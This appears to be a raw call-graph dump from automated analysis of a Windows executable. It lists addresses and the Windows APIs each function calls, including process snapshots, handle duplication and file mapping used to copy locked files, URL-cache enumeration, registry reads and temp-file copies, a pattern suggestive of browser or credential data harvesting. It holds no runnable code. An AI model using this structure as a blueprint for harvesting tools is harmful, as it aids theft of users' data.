38314->38316 38315 40be26 wcsncmp 38315->38316 38316->38308 38316->38315 38319 40be7d memset 38316->38319 38320 40bea7 memcpy 38316->38320 38321 40bf11 wcschr 38316->38321 38322 40b2cc 27 API calls 38316->38322 38324 40bf43 LocalFree 38316->38324 38937 40bd5d 28 API calls 38316->38937 38938 404423 38316->38938 38319->38316 38319->38320 38320->38316 38320->38321 38321->38316 38323 40bef6 _wcsnicmp 38322->38323 38323->38316 38323->38321 38324->38316 38325 4135f7 38951 4135e0 38325->38951 38328 40b2cc 27 API calls 38329 41360d 38328->38329 38330 40a804 8 API calls 38329->38330 38331 413613 38330->38331 38332 41361b 38331->38332 38333 41363e 38331->38333 38334 40b273 27 API calls 38332->38334 38335 4135e0 FreeLibrary 38333->38335 38336 413625 GetProcAddress 38334->38336 38337 413643 38335->38337 38336->38333 38338 413648 38336->38338 38337->38093 38339 413658 38338->38339 38340 4135e0 FreeLibrary 38338->38340 38339->38093 38341 413666 38340->38341 38341->38093 38954 4449b9 38342->38954 38345 444c1f 38345->38078 38346 4449b9 42 API calls 38348 444b4b 38346->38348 38347 444c15 38349 4449b9 42 API calls 38347->38349 38348->38347 38975 444972 GetVersionExW 38348->38975 38349->38345 38351 444b99 memcmp 38356 444b8c 38351->38356 38352 444c0b 38979 444a85 42 API calls 38352->38979 38356->38351 38356->38352 38976 444aa5 42 API calls 38356->38976 38977 40a7a0 GetVersionExW 38356->38977 38978 444a85 42 API calls 38356->38978 38359 40399d 38358->38359 38980 403a16 38359->38980 38361 403a09 38994 40b1ab free free 38361->38994 38363 4039a3 38363->38361 38367 4039f4 38363->38367 38991 40a02c CreateFileW 38363->38991 38364 403a12 wcsrchr 38364->38092 38367->38361 38368 4099c6 2 API calls 38367->38368 38368->38361 38370 414c2e 16 API calls 38369->38370 38371 404048 38370->38371 38372 414c2e 16 API calls 38371->38372 38373 404056 38372->38373 38374 409d1f 6 API calls 38373->38374 38375 404073 38374->38375 38376 409d1f 6 API calls 38375->38376 38377 40408e 38376->38377 38378 409d1f 6 API calls 38377->38378 38379 4040a6 38378->38379 38380 403af5 20 API calls 38379->38380 38381 4040ba 38380->38381 38382 403af5 20 API calls 38381->38382 38383 4040cb 38382->38383 39021 40414f memset 38383->39021 38385 404140 39035 40b1ab free free 38385->39035 38387 4040ec memset 38390 4040e0 38387->38390 38388 404148 38388->38158 38389 4099c6 2 API calls 38389->38390 38390->38385 38390->38387 38390->38389 38391 40a8ab 9 API calls 38390->38391 38391->38390 39048 40a6e6 WideCharToMultiByte 38392->39048 38394 4087ed 39049 4095d9 memset 38394->39049 38397 408809 memset memset memset memset memset 38398 40b2cc 27 API calls 38397->38398 38399 4088a1 38398->38399 38400 409d1f 6 API calls 38399->38400 38401 4088b1 38400->38401 38402 40b2cc 27 API calls 38401->38402 38403 4088c0 38402->38403 38404 409d1f 6 API calls 38403->38404 38405 4088d0 38404->38405 38406 40b2cc 27 API calls 38405->38406 38407 4088df 38406->38407 38408 409d1f 6 API calls 38407->38408 38409 4088ef 38408->38409 38410 40b2cc 27 API calls 38409->38410 38411 4088fe 38410->38411 38412 409d1f 6 API calls 38411->38412 38413 40890e 38412->38413 38414 40b2cc 27 API calls 38413->38414 38415 40891d 38414->38415 38416 409d1f 6 API calls 38415->38416 38417 40892d 38416->38417 39068 409b98 GetFileAttributesW 38417->39068 38419 40893e 38420 408943 38419->38420 38421 408958 38419->38421 39069 407fdf 75 API calls 38420->39069 39070 409b98 GetFileAttributesW 38421->39070 38424 408953 38424->38158 38425 408964 38426 408969 38425->38426 38427 40897b 38425->38427 39071 4082c7 199 API calls 38426->39071 39072 409b98 GetFileAttributesW 38427->39072 38430 408987 38444 40b633 free 38443->38444 38445 413d65 CreateToolhelp32Snapshot memset Process32FirstW 38444->38445 38446 413f00 Process32NextW 38445->38446 38447 413da5 OpenProcess 38446->38447 38448 413f17 CloseHandle 38446->38448 38449 413df3 memset 38447->38449 38454 413eb0 38447->38454 38448->38188 39370 413f27 38449->39370 38451 413ebf free 38451->38454 38452 4099f4 3 API calls 38452->38454 38454->38446 38454->38451 38454->38452 38455 413e37 GetModuleHandleW 38456 413e1f 38455->38456 38457 413e46 GetProcAddress 38455->38457 38456->38455 39375 413959 38456->39375 39391 413ca4 38456->39391 38457->38456 38459 413ea2 CloseHandle 38459->38454 38461 414c2e 16 API calls 38460->38461 38462 403eb7 38461->38462 38463 414c2e 16 API calls 38462->38463 38464 403ec5 38463->38464 38465 409d1f 6 API calls 38464->38465 38466 403ee2 38465->38466 38467 409d1f 6 API calls 38466->38467 38468 403efd 38467->38468 38469 409d1f 6 API calls 38468->38469 38470 403f15 38469->38470 38471 403af5 20 API calls 38470->38471 38472 403f29 38471->38472 38473 403af5 20 API calls 38472->38473 38474 403f3a 38473->38474 38475 40414f 33 API calls 38474->38475 38476 403f4f 38475->38476 38477 403faf 38476->38477 38479 403f5b memset 38476->38479 38481 4099c6 2 API calls 38476->38481 38482 40a8ab 9 API calls 38476->38482 39405 40b1ab free free 38477->39405 38479->38476 38480 403fb7 38480->38098 38481->38476 38482->38476 38484 414c2e 16 API calls 38483->38484 38485 403d26 38484->38485 38486 414c2e 16 API calls 38485->38486 38487 403d34 38486->38487 38488 409d1f 6 API calls 38487->38488 38489 403d51 38488->38489 38490 409d1f 6 API calls 38489->38490 38491 403d6c 38490->38491 38492 409d1f 6 API calls 38491->38492 38493 403d84 38492->38493 38494 403af5 20 API calls 38493->38494 38495 403d98 38494->38495 38496 403af5 20 API calls 38495->38496 38497 403da9 38496->38497 38498 40414f 33 API calls 38497->38498 38499 403dbe 38498->38499 38500 403e1e 38499->38500 38501 403dca memset 38499->38501 38504 4099c6 2 API calls 38499->38504 38505 40a8ab 9 API calls 38499->38505 39406 40b1ab free free 38500->39406 38501->38499 38503 403e26 38503->38125 38504->38499 38505->38499 38507 414b81 9 API calls 38506->38507 38508 414c40 38507->38508 38509 414c73 memset 38508->38509 39407 409cea 38508->39407 38510 414c94 38509->38510 39410 414592 RegOpenKeyExW 38510->39410 38513 414c64 38513->38129 38515 414cc1 38516 414cf4 wcscpy 38515->38516 39411 414bb0 wcscpy 38515->39411 38516->38513 38518 414cd2 39412 4145ac RegQueryValueExW 38518->39412 38520 414ce9 RegCloseKey 38520->38516 38522 409d62 38521->38522 38523 409d43 wcscpy 38521->38523 38522->38159 38524 409719 2 API calls 38523->38524 38525 409d51 wcscat 38524->38525 38525->38522 38527 40aebe FindClose 38526->38527 38528 40ae21 38527->38528 38529 4099c6 2 API calls 38528->38529 38530 40ae35 38529->38530 38531 409d1f 6 API calls 38530->38531 38532 40ae49 38531->38532 38532->38232 38534 40ade0 38533->38534 38535 40ae0f 38533->38535 38534->38535 38536 40ade7 wcscmp 38534->38536 38535->38232 38536->38535 38537 40adfe wcscmp 38536->38537 38537->38535 38539 40ae18 9 API calls 38538->38539 38545 4453c4 38539->38545 38540 40ae51 9 API calls 38540->38545 38541 4453f3 38543 40aebe FindClose 38541->38543 38542 40add4 2 API calls 38542->38545 38544 4453fe 38543->38544 38544->38232 38545->38540 38545->38541 38545->38542 38546 445403 253 API calls 38545->38546 38546->38545 38548 40ae7b FindNextFileW 38547->38548 38549 40ae5c FindFirstFileW 38547->38549 38550 40ae94 38548->38550 38551 40ae8f 38548->38551 38549->38550 38553 40aeb6 38550->38553 38554 409d1f 6 API calls 38550->38554 38552 40aebe FindClose 38551->38552 38552->38550 38553->38232 38554->38553 38555->38113 38556->38137 38557->38191 38558->38170 38559->38170 38560->38205 38562 409c89 38561->38562 38562->38228 38563->38259 38565 413d39 38564->38565 38566 413d2f FreeLibrary 38564->38566 38567 40b633 free 38565->38567 38566->38565 38568 413d42 38567->38568 38569 40b633 free 38568->38569 38570 413d4a 38569->38570 38570->38086 38571->38090 38572->38139 38573->38151 38575 44db70 38574->38575 38576 40b6fc memset 38575->38576 38577 409c70 2 API calls 38576->38577 38578 40b732 wcsrchr 38577->38578 38579 40b743 38578->38579 38580 40b746 memset 38578->38580 38579->38580 38581 40b2cc 27 API calls 38580->38581 38582 40b76f 38581->38582 38583 409d1f 6 API calls 38582->38583 38584 40b783 38583->38584 39413 409b98 GetFileAttributesW 38584->39413 38586 40b792 38587 40b7c2 38586->38587 38589 409c70 2 API calls 38586->38589 39414 40bb98 38587->39414 38591 40b7a5 38589->38591 38594 40b2cc 27 API calls 38591->38594 38592 40b837 CloseHandle 38596 40b83e memset 38592->38596 38593 40b817 39448 409a45 GetTempPathW 38593->39448 38597 40b7b2 38594->38597 39447 40a6e6 WideCharToMultiByte 38596->39447 38600 409d1f 6 API calls 38597->38600 38598 40b827 CopyFileW 38598->38596 38600->38587 38601 40b866 38602 444432 121 API calls 38601->38602 38603 40b879 38602->38603 38604 40bad5 38603->38604 38605 40b273 27 API calls 38603->38605 38606 40baeb 38604->38606 38607 40bade DeleteFileW 38604->38607 38609 40b89a 38605->38609 38608 40b04b ??3@YAXPAX 38606->38608 38607->38606 38610 40baf3 38608->38610 38611 438552 134 API calls 38609->38611 38610->38162 38612 40b8a4 38611->38612 38613 40bacd 38612->38613 38614 4251c4 137 API calls 38612->38614 38615 443d90 111 API calls 38613->38615 38623 40b8b8 38614->38623 38615->38604 38616 40bac6 39460 424f26 123 API calls 38616->39460 38617 40b8bd memset 39451 425413 17 API calls 38617->39451 38620 425413 17 API calls 38620->38623 38623->38616 38623->38617 38623->38620 38624 40a71b MultiByteToWideChar 38623->38624 38625 40a734 MultiByteToWideChar 38623->38625 38628 40b9b5 memcmp 38623->38628 38629 4099c6 2 API calls 38623->38629 38630 404423 37 API calls 38623->38630 38633 40bb3e memset memcpy 38623->38633 38634 4251c4 137 API calls 38623->38634 38639 40ba5f memcmp 38623->38639 39452 4253ef 16 API calls 38623->39452 39453 40b64c SystemTimeToFileTime FileTimeToLocalFileTime 38623->39453 39454 4253af 17 API calls 38623->39454 39455 4253cf 17 API calls 38623->39455 39456 447280 memset 38623->39456 39457 447960 memset memcpy memcpy memcpy 38623->39457 39458 40afe8 ??2@YAPAXI memcpy ??3@YAXPAX 38623->39458 39459 447920 memcpy memcpy memcpy 38623->39459 38624->38623 38625->38623 38628->38623 38629->38623 38630->38623 39461 40a734 MultiByteToWideChar 38633->39461 38634->38623 38636 40bb88 LocalFree 38636->38623 38639->38623 38640->38165 38642 40aed1 38641->38642 38643 40aec7 FindClose 38641->38643 38642->38219 38643->38642 38645 4099d7 38644->38645 38646 4099da memcpy 38644->38646 38645->38646 38646->38148 38648 40b2cc 27 API calls 38647->38648 38649 44543f 38648->38649 38650 409d1f 6 API calls 38649->38650 38651 44544f 38650->38651 39553 409b98 GetFileAttributesW 38651->39553 38653 44545e 38654 445476 38653->38654 38655 40b6ef 252 API calls 38653->38655 38656 40b2cc 27 API calls 38654->38656 38655->38654 38657 445482 38656->38657 38658 409d1f 6 API calls 38657->38658 38659 445492 38658->38659 39554 409b98 GetFileAttributesW 38659->39554 38661 4454a1 38662 4454b9 38661->38662 38663 40b6ef 252 API calls 38661->38663 38662->38179 38663->38662 38664->38177 38665->38196 38666->38202 38667->38240 38668->38216 38669->38267 38670->38267 38671->38248 38672->38278 38673->38280 38674->38282 38676 414c2e 16 API calls 38675->38676 38677 40c2ae 38676->38677 38747 40c1d3 38677->38747 38682 40c3be 38699 40a8ab 38682->38699 38683 40afcf 2 API calls 38684 40c2fd FindFirstUrlCacheEntryW 38683->38684 38685 40c3b6 38684->38685 38686 40c31e wcschr 38684->38686 38687 40b04b ??3@YAXPAX 38685->38687 38688 40c331 38686->38688 38689 40c35e FindNextUrlCacheEntryW 38686->38689 38687->38682 38690 40a8ab 9 API calls 38688->38690 38689->38686 38691 40c373 GetLastError 38689->38691 38694 40c33e wcschr 38690->38694 38692 40c3ad FindCloseUrlCache 38691->38692 38693 40c37e 38691->38693 38692->38685 38695 40afcf 2 API calls 38693->38695 38694->38689 38696 40c34f 38694->38696 38697 40c391 FindNextUrlCacheEntryW 38695->38697 38698 40a8ab 9 API calls 38696->38698 38697->38686 38697->38692 38698->38689 38841 40a97a 38699->38841 38702 40a8cc 38702->38289 38703 40a8d0 7 API calls 38703->38702 38846 40b1ab free free 38704->38846 38706 40c3dd 38707 40b2cc 27 API calls 38706->38707 38708 40c3e7 38707->38708 38847 414592 RegOpenKeyExW 38708->38847 38710 40c3f4 38711 40c50e 38710->38711 38712 40c3ff 38710->38712 38726 405337 38711->38726 38713 40a9ce 4 API calls 38712->38713 38714 40c418 memset 38713->38714 38848 40aa1d 38714->38848 38717 40c471 38719 40c47a _wcsupr 38717->38719 38718 40c505 RegCloseKey 38718->38711 38720 40a8d0 7 API calls 38719->38720 38721 40c498 38720->38721 38722 40a8d0 7 API calls 38721->38722 38723 40c4ac memset 38722->38723 38724 40aa1d 38723->38724 38725 40c4e4 RegEnumValueW 38724->38725 38725->38718 38725->38719 38850 405220 38726->38850 38730 4099c6 2 API calls 38729->38730 38731 40a714 _wcslwr 38730->38731 38732 40c634 38731->38732 38907 405361 38732->38907 38735 40c65c wcslen 38910 4053b6 39 API calls 38735->38910 38736 40c71d wcslen 38736->38296 38738 40c677 38739 40c713 38738->38739 38911 40538b 39 API calls 38738->38911 38913 4053df 39 API calls 38739->38913 38742 40c6a5 38742->38739 38743 40c6a9 memset 38742->38743 38744 40c6d3 38743->38744 38912 40c589 43 API calls 38744->38912 38746->38297 38748 40ae18 9 API calls 38747->38748 38754 40c210 38748->38754 38749 40ae51 9 API calls 38749->38754 38750 40c264 38751 40aebe FindClose 38750->38751 38753 40c26f 38751->38753 38752 40add4 2 API calls 38752->38754 38759 40e5ed memset memset 38753->38759 38754->38749 38754->38750 38754->38752 38755 40c231 _wcsicmp 38754->38755 38756 40c1d3 35 API calls 38754->38756 38755->38754 38757 40c248 38755->38757 38756->38754 38772 40c084 22 API calls 38757->38772 38760 414c2e 16 API calls 38759->38760 38761 40e63f 38760->38761 38762 409d1f 6 API calls 38761->38762 38763 40e658 38762->38763 38773 409b98 GetFileAttributesW 38763->38773 38765 40e667 38766 409d1f 6 API calls 38765->38766 38768 40e680 38765->38768 38766->38768 38774 409b98 GetFileAttributesW 38768->38774 38769 40e68f 38770 40c2d8 38769->38770 38775 40e4b2 38769->38775 38770->38682 38770->38683 38772->38754 38773->38765 38774->38769 38796 40e01e 38775->38796 38777 40e593 38779 40e5b0 38777->38779 38780 40e59c DeleteFileW 38777->38780 38778 40e521 38778->38777 38819 40e175 38778->38819 38781 40b04b ??3@YAXPAX 38779->38781 38780->38779 38782 40e5bb 38781->38782 38784 40e5c4 CloseHandle 38782->38784 38785 40e5cc 38782->38785 38784->38785 38787 40b633 free 38785->38787 38786 40e573 38788 40e584 38786->38788 38789 40e57c CloseHandle 38786->38789 38790 40e5db 38787->38790 38840 40b1ab free free 38788->38840 38789->38788 38793 40b633 free 38790->38793 38792 40e540 38792->38786 38839 40e2ab 30 API calls 38792->38839 38794 40e5e3 38793->38794 38794->38770 38797 406214 22 API calls 38796->38797 38798 40e03c 38797->38798 38799 40e16b 38798->38799 38800 40dd85 74 API calls 38798->38800 38799->38778 38801 40e06b 38800->38801 38801->38799 38802 40afcf ??2@YAPAXI ??3@YAXPAX 38801->38802 38803 40e08d OpenProcess 38802->38803 38804 40e0a4 GetCurrentProcess DuplicateHandle 38803->38804 38808 40e152 38803->38808 38805 40e0d0 GetFileSize 38804->38805 38806 40e14a CloseHandle 38804->38806 38809 409a45 GetTempPathW GetWindowsDirectoryW GetTempFileNameW 38805->38809 38806->38808 38807 40e160 38811 40b04b ??3@YAXPAX 38807->38811 38808->38807 38810 406214 22 API calls 38808->38810 38812 40e0ea 38809->38812 38810->38807 38811->38799 38813 4096dc CreateFileW 38812->38813 38814 40e0f1 CreateFileMappingW 38813->38814 38815 40e140 CloseHandle CloseHandle 38814->38815 38816 40e10b MapViewOfFile 38814->38816 38815->38806 38817 40e13b CloseHandle 38816->38817 38818 40e11f WriteFile UnmapViewOfFile 38816->38818 38817->38815 38818->38817 38820 40e18c 38819->38820 38821 406b90 11 API calls 38820->38821 38822 40e19f 38821->38822 38823 40e1a7 memset 38822->38823 38824 40e299 38822->38824 38829 40e1e8 38823->38829 38825 4069a3 ??3@YAXPAX free 38824->38825 38826 40e2a4 38825->38826 38826->38792 38827 406e8f 13 API calls 38827->38829 38828 406b53 SetFilePointerEx ReadFile 38828->38829 38829->38827 38829->38828 38830 40e283 38829->38830 38831 40dd50 _wcsicmp 38829->38831 38835 40742e 8 API calls 38829->38835 38836 40aae3 wcslen wcslen _memicmp 38829->38836 38837 40e244 _snwprintf 38829->38837 38832 40e291 38830->38832 38833 40e288 free 38830->38833 38831->38829 38834 40aa04 free 38832->38834 38833->38832 38834->38824 38835->38829 38836->38829 38838 40a8d0 7 API calls 38837->38838 38838->38829 38839->38792 38840->38777 38843 40a980 38841->38843 38842 40a8bb 38842->38702 38842->38703 38843->38842 38844 40a995 _wcsicmp 38843->38844 38845 40a99c wcscmp 38843->38845 38844->38843 38845->38843 38846->38706 38847->38710 38849 40aa23 RegEnumValueW 38848->38849 38849->38717 38849->38718 38851 405335 38850->38851 38852 40522a 38850->38852 38851->38296 38853 40b2cc 27 API calls 38852->38853 38854 405234 38853->38854 38855 40a804 8 API calls 38854->38855 38856 40523a 38855->38856 38895 40b273 38856->38895 38858 405248 _mbscpy _mbscat GetProcAddress 38859 40b273 27 API calls 38858->38859 38860 405279 38859->38860 38898 405211 GetProcAddress 38860->38898 38862 405282 38863 40b273 27 API calls 38862->38863 38864 40528f 38863->38864 38899 405211 GetProcAddress 38864->38899 38866 405298 38867 40b273 27 API calls 38866->38867 38868 4052a5 38867->38868 38900 405211 GetProcAddress 38868->38900 38870 4052ae 38871 40b273 27 API calls 38870->38871 38872 4052bb 38871->38872 38901 405211 GetProcAddress 38872->38901 38874 4052c4 38875 40b273 27 API calls 38874->38875 38876 4052d1 38875->38876 38902 405211 GetProcAddress 38876->38902 38878 4052da 38879 40b273 27 API calls 38878->38879 38880 4052e7 38879->38880 38903 405211 GetProcAddress 38880->38903 38882 4052f0 38883 40b273 27 API calls 38882->38883 38884 4052fd 38883->38884 38904 405211 GetProcAddress 38884->38904 38886 405306 38887 40b273 27 API calls 38886->38887 38888 405313 38887->38888 38905 405211 GetProcAddress 38888->38905 38890 40531c 38891 40b273 27 API calls 38890->38891 38892 405329 38891->38892 38906 405211 GetProcAddress 38892->38906 38894 405332 38894->38851 38896 40b58d 27 API calls 38895->38896 38897 40b18c 38896->38897 38897->38858 38898->38862 38899->38866 38900->38870 38901->38874 38902->38878 38903->38882 38904->38886 38905->38890 38906->38894 38908 405220 39 API calls 38907->38908 38909 405369 38908->38909 38909->38735 38909->38736 38910->38738 38911->38742 38912->38739 38913->38736 38915 40440c FreeLibrary 38914->38915 38916 40436d 38915->38916 38917 40a804 8 API calls 38916->38917 38918 404377 38917->38918 38919 404383 38918->38919 38920 404405 38918->38920 38921 40b273 27 API calls 38919->38921 38920->38308 38920->38310 38920->38311 38922 40438d GetProcAddress 38921->38922 38923 40b273 27 API calls 38922->38923 38924 4043a7 GetProcAddress 38923->38924 38925 40b273 27 API calls 38924->38925 38926 4043ba GetProcAddress 38925->38926 38927 40b273 27 API calls 38926->38927 38928 4043ce GetProcAddress 38927->38928 38929 40b273 27 API calls 38928->38929 38930 4043e2 GetProcAddress 38929->38930 38931 4043f1 38930->38931 38932 4043f7 38931->38932 38933 40440c FreeLibrary 38931->38933 38932->38920 38933->38920 38935 404413 FreeLibrary 38934->38935 38936 40441e 38934->38936 38935->38936 38936->38325 38937->38316 38939 40442e 38938->38939 38940 40447e 38938->38940 38941 40b2cc 27 API calls 38939->38941 38940->38316 38942 404438 38941->38942 38943 40a804 8 API calls 38942->38943 38944 40443e 38943->38944 38945 404445 38944->38945 38946 404467 38944->38946 38947 40b273 27 API calls 38945->38947 38946->38940 38948 404475 FreeLibrary 38946->38948 38949 40444f GetProcAddress 38947->38949 38948->38940 38949->38946 38950 404460 38949->38950 38950->38946 38952 4135f6 38951->38952 38953 4135eb FreeLibrary 38951->38953 38952->38328 38953->38952 38955 4449c4 38954->38955 38956 444a52 38954->38956 38957 40b2cc 27 API calls 38955->38957 38956->38345 38956->38346 38958 4449cb 38957->38958 38959 40a804 8 API calls 38958->38959 38960 4449d1 38959->38960 38961 40b273 27 API calls 38960->38961 38962 4449dc GetProcAddress 38961->38962 38963 40b273 27 API calls 38962->38963 38964 4449f3 GetProcAddress 38963->38964 38965 40b273 27 API calls 38964->38965 38966 444a04 GetProcAddress 38965->38966 38967 40b273 27 API calls 38966->38967 38968 444a15 GetProcAddress 38967->38968 38969 40b273 27 API calls 38968->38969 38970 444a26 GetProcAddress 38969->38970 38971 40b273 27 API calls 38970->38971 38972 444a37 GetProcAddress 38971->38972 38973 40b273 27 API calls 38972->38973 38974 444a48 GetProcAddress 38973->38974 38974->38956 38975->38356 38976->38356 38977->38356 38978->38356 38979->38347 38981 403a29 38980->38981 38995 403bed memset memset 38981->38995 38983 403ae7 39008 40b1ab free free 38983->39008 38984 403a3f memset 38990 403a2f 38984->38990 38986 403aef 38986->38363 38987 409b98 GetFileAttributesW 38987->38990 38988 40a8d0 7 API calls 38988->38990 38989 409d1f 6 API calls 38989->38990 38990->38983 38990->38984 38990->38987 38990->38988 38990->38989 38992 40a051 GetFileTime CloseHandle 38991->38992 38993 4039ca CompareFileTime 38991->38993 38992->38993 38993->38363 38994->38364 38996 414c2e 16 API calls 38995->38996 38997 403c38 38996->38997 38998 409719 2 API calls 38997->38998 38999 403c3f wcscat 38998->38999 39000 414c2e 16 API calls 38999->39000 39001 403c61 39000->39001 39002 409719 2 API calls 39001->39002 39003 403c68 wcscat 39002->39003 39009 403af5 39003->39009 39006 403af5 20 API calls 39007 403c95 39006->39007 39007->38990 39008->38986 39010 403b02 39009->39010 39011 40ae18 9 API calls 39010->39011 39019 403b37 39011->39019 39012 403bdb 39014 40aebe FindClose 39012->39014 39013 40add4 wcscmp wcscmp 39013->39019 39015 403be6 39014->39015 39015->39006 39016 40ae18 9 API calls 39016->39019 39017 40ae51 9 API calls 39017->39019 39018 40aebe FindClose 39018->39019 39019->39012 39019->39013 39019->39016 39019->39017 39019->39018 39020 40a8d0 7 API calls 39019->39020 39020->39019 39022 409d1f 6 API calls 39021->39022 39023 404190 39022->39023 39036 409b98 GetFileAttributesW 39023->39036 39025 40419c 39026 4041a7 6 API calls 39025->39026 39027 40435c 39025->39027 39029 40424f 39026->39029 39027->38390 39029->39027 39030 40425e memset 39029->39030 39032 409d1f 6 API calls 39029->39032 39033 40a8ab 9 API calls 39029->39033 39037 414842 39029->39037 39030->39029 39031 404296 wcscpy 39030->39031 39031->39029 39032->39029 39034 4042b6 memset memset _snwprintf wcscpy 39033->39034 39034->39029 39035->38388 39036->39025 39040 41443e 39037->39040 39039 414866 39039->39029 39041 41444b 39040->39041 39042 414451 39041->39042 39043 4144a3 GetPrivateProfileStringW 39041->39043 39044 414491 39042->39044 39045 414455 wcschr 39042->39045 39043->39039 39046 414495 WritePrivateProfileStringW 39044->39046 39045->39044 39047 414463 _snwprintf 39045->39047 39046->39039 39047->39046 39048->38394 39050 40b2cc 27 API calls 39049->39050 39051 409615 39050->39051 39052 409d1f 6 API calls 39051->39052 39053 409625 39052->39053 39078 409b98 GetFileAttributesW 39053->39078 39055 409634 39056 409648 39055->39056 39079 4091b8 memset 39055->39079 39057 40b2cc 27 API calls 39056->39057 39061 408801 39056->39061 39059 40965d 39057->39059 39060 409d1f 6 API calls 39059->39060 39062 40966d 39060->39062 39061->38397 39061->38424 39131 409b98 GetFileAttributesW 39062->39131 39064 40967c 39064->39061 39065 409681 39064->39065 39132 409529 72 API calls 39065->39132 39067 409690 39067->39061 39068->38419 39069->38424 39070->38425 39071->38424 39072->38430 39078->39055 39133 40a6e6 WideCharToMultiByte 39079->39133 39081 409202 39134 444432 39081->39134 39084 40b273 27 API calls 39085 409236 39084->39085 39180 438552 39085->39180 39088 409383 39090 40b273 27 API calls 39088->39090 39092 409399 39090->39092 39091 409254 39093 40937b 39091->39093 39201 4253cf 17 API calls 39091->39201 39094 438552 134 API calls 39092->39094 39205 424f26 123 API calls 39093->39205 39112 4093a3 39094->39112 39097 409267 39202 4253cf 17 API calls 39097->39202 39098 4094ff 39209 443d90 39098->39209 39101 4251c4 137 API calls 39101->39112 39102 409273 39103 409507 39111 40951d 39103->39111 39229 408f2f 77 API calls 39103->39229 39105 4093df 39208 424f26 123 API calls 39105->39208 39109 4253cf 17 API calls 39109->39112 39111->39056 39112->39098 39112->39101 39112->39105 39112->39109 39114 4093e4 39112->39114 39206 4253af 17 API calls 39114->39206 39121 4093ed 39207 4253af 17 API calls 39121->39207 39124 4093f9 39124->39105 39125 409409 memcmp 39124->39125 39125->39105 39126 409421 memcmp 39125->39126 39127 4094a4 memcmp 39126->39127 39128 409435 39126->39128 39127->39105 39128->39105 39131->39064 39132->39067 39133->39081 39230 4438b5 39134->39230 39136 44444c 39142 409215 39136->39142 39244 415a6d 39136->39244 39138 4442e6 11 API calls 39140 44469e 39138->39140 39139 444486 39141 4444b9 memcpy 39139->39141 39179 4444a4 39139->39179 39140->39142 39144 443d90 111 API calls 39140->39144 39248 415258 39141->39248 39142->39084 39142->39111 39144->39142 39145 444524 39146 444541 39145->39146 39147 44452a 39145->39147 39251 444316 39146->39251 39148 416935 16 API calls 39147->39148 39148->39179 39151 444316 18 API calls 39152 444563 39151->39152 39153 444316 18 API calls 39152->39153 39154 44456f 39153->39154 39155 444316 18 API calls 39154->39155 39156 44457f 39155->39156 39156->39179 39265 432d4e 39156->39265 39159 444316 18 API calls 39179->39138 39318 438460 39180->39318 39182 409240 39182->39088 39183 4251c4 39182->39183 39330 424f07 39183->39330 39185 4251e4 39186 4251f7 39185->39186 39187 4251e8 39185->39187 39338 4250f8 39186->39338 39337 4446ea 11 API calls 39187->39337 39189 4251f2 39189->39091 39191 425209 39194 425249 39191->39194 39197 4250f8 127 API calls 39191->39197 39198 425287 39191->39198 39346 4384e9 135 API calls 39191->39346 39347 424f74 124 API calls 39191->39347 39194->39198 39348 424ff0 13 API calls 39194->39348 39197->39191 39350 415c7d 39198->39350 39201->39097 39202->39102 39205->39088 39206->39121 39207->39124 39208->39098 39210 443da3 39209->39210 39219 443db6 39209->39219 39354 41707a 39210->39354 39212 443da8 39213 443dbc 39212->39213 39214 443dac 39212->39214 39359 4300e8 39213->39359 39367 4446ea 11 API calls 39214->39367 39219->39103 39229->39111 39231 4438d0 39230->39231 39241 4438c9 39230->39241 39232 415378 memcpy memcpy 39231->39232 39233 4438d5 39232->39233 39234 4154e2 10 API calls 39233->39234 39235 443906 39233->39235 39233->39241 39234->39235 39236 443970 memset 39235->39236 39235->39241 39238 44398b 39236->39238 39237 4439a0 39239 415700 10 API calls 39237->39239 39237->39241 39238->39237 39240 41975c 10 API calls 39238->39240 39242 4439c0 39239->39242 39240->39237 39241->39136 39242->39241 39243 418981 10 API calls 39242->39243 39243->39241 39245 415a77 39244->39245 39246 415a8d 39245->39246 39247 415a7e memset 39245->39247 39246->39139 39247->39246 39249 4438b5 11 API calls 39248->39249 39250 41525d 39249->39250 39250->39145 39252 444328 39251->39252 39253 444423 39252->39253 39254 44434e 39252->39254 39255 4446ea 11 API calls 39253->39255 39256 432d4e memset memset memcpy 39254->39256 39262 444381 39255->39262 39257 44435a 39256->39257 39259 444375 39257->39259 39264 44438b 39257->39264 39258 432d4e memset memset memcpy 39260 4443ec 39258->39260 39261 416935 16 API calls 39259->39261 39260->39262 39263 416935 16 API calls 39260->39263 39261->39262 39262->39151 39263->39262 39264->39258 39266 432d65 39265->39266 39267 432d58 39265->39267 39266->39159 39268 432cc4 memset memset memcpy 39267->39268 39268->39266 39319 41703f 11 API calls 39318->39319 39320 43847a 39319->39320 39321 43848a 39320->39321 39322 43847e 39320->39322 39324 438270 134 API calls 39321->39324 39323 4446ea 11 API calls 39322->39323 39326 438488 39323->39326 39325 4384aa 39324->39325 39325->39326 39327 424f26 123 API calls 39325->39327 39326->39182 39328 4384bb 39327->39328 39329 438270 134 API calls 39328->39329 39329->39326 39331 424f1f 39330->39331 39332 424f0c 39330->39332 39334 424eea 11 API calls 39331->39334 39333 416760 11 API calls 39332->39333 39335 424f18 39333->39335 39336 424f24 39334->39336 39335->39185 39336->39185 39337->39189 39339 425108 39338->39339 39345 42510d 39338->39345 39340 424f74 124 API calls 39339->39340 39340->39345 39341 42569b 125 API calls 39342 42516e 39341->39342 39344 415c7d 16 API calls 39342->39344 39343 425115 39343->39191 39344->39343 39345->39341 39345->39343 39346->39191 39347->39191 39355 417085 39354->39355 39356 4170ab 39354->39356 39355->39356 39357 416760 11 API calls 39355->39357 39356->39212 39358 4170a4 39357->39358 39358->39212 39367->39219 39397 413f4f 39370->39397 39373 413f37 K32GetModuleFileNameExW 39374 413f4a 39373->39374 39374->38456 39376 413969 wcscpy 39375->39376 39377 41396c wcschr 39375->39377 39380 413a3a 39376->39380 39377->39376 39379 41398e 39377->39379 39402 4097f7 wcslen wcslen _memicmp 39379->39402 39380->38456 39382 41399a 39383 4139a4 memset 39382->39383 39384 4139e6 39382->39384 39403 409dd5 GetWindowsDirectoryW wcscpy 39383->39403 39386 413a31 wcscpy 39384->39386 39387 4139ec memset 39384->39387 39386->39380 39404 409dd5 GetWindowsDirectoryW wcscpy 39387->39404 39388 4139c9 wcscpy wcscat 39388->39380 39390 413a11 memcpy wcscat 39390->39380 39392 413cb0 GetModuleHandleW 39391->39392 39393 413cda 39391->39393 39392->39393 39394 413cbf GetProcAddress 39392->39394 39395 413ce3 GetProcessTimes 39393->39395 39396 413cf6 39393->39396 39394->39393 39395->38459 39396->38459 39398 413f2f 39397->39398 39399 413f54 39397->39399 39398->39373 